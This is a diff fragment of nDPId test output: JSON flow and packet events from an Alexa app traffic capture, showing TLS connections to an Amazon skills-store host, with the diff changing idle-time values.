-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} 
-01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZVhAAEAGqY+sECrYNu8d\/Z+VAbuWKg0YAAAAAKAC\/\/9uYQAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107365,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1490976107365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107365,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87ItAAEAGIlysECrYNu8d\/Z+WAbsjoITLAAAAAKAC\/\/9pNwAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107366,"flow_last_seen":1490976107366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107366,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1490976107366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107366,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY5AAEAGRVmsECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8HXAAAAgQFtAQCCAoA9mhAAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107455,"flow_last_seen":1490976107455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976107455,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1490976107455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976107455,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fklAAEAGkJ6sECrYNu8d\/Z+YAbtWLhYAAAAAAKAC\/\/+laQAAAgQFtAQCCAoA9mhJAAAAAAEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1490976107475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107475,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwq71AAOcGvDU27x39rBAq2AG7n5aOPa1rI6CEzHASH\/6yzwAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1490976107477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107477,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7IxAAEAGIm+sECrYNu8d\/Z+WAbsjoITMjj2tbFAQAVf9QAAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107479,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107479,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1490976107484,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107484,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwkaBAAOcG1lI27x39rBAq2AG7n5UJgL2ZlioNGXASH\/4siQAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1490976107485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107485,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZVlAAEAGqaKsECrYNu8d\/Z+VAbuWKg0ZCYC9mlAQAVd2+gAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107365,"flow_last_seen":1490976107486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1490976107511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976107511,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwxddAAOcGohs27x39rBAq2AG7n5iFQQi8Vi4WAXASH\/6ctgAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1490976107513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976107513,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofkpAAEAGkLGsECrYNu8d\/Z+YAbtWLhYBhUEIvVAQAVfnJwAA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1675,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976107455,"flow_last_seen":1490976107514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1490976107514,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1679,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107365,"flow_last_seen":1490976107622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976107455,"flow_last_seen":1490976107625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2906,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1490976107625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","server_names":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., 
CN=skills-store.amazon.com","alpn":"h2,http\/1.1","fingerprint":"2A:40:0E:E9:9A:EC:7C:0D:40:AA:C9:C5:66:67:00:B8:3E:90:DC:B2"}} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1490976108360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976108360,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8yY9AAEAGRVisECrYNu8d\/Z+XAbtod6HOAAAAAKAC\/\/8G+AAAAgQFtAQCCAoA9mikAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1490976108548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976108548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt7hAAOcGsDo27x39rBAq2AG7n5d09wMmaHehz3ASH\/4UgAAAAgQFtAEDAwY="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1856,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976114879,"flow_last_seen":1490976114879,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1490976114879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
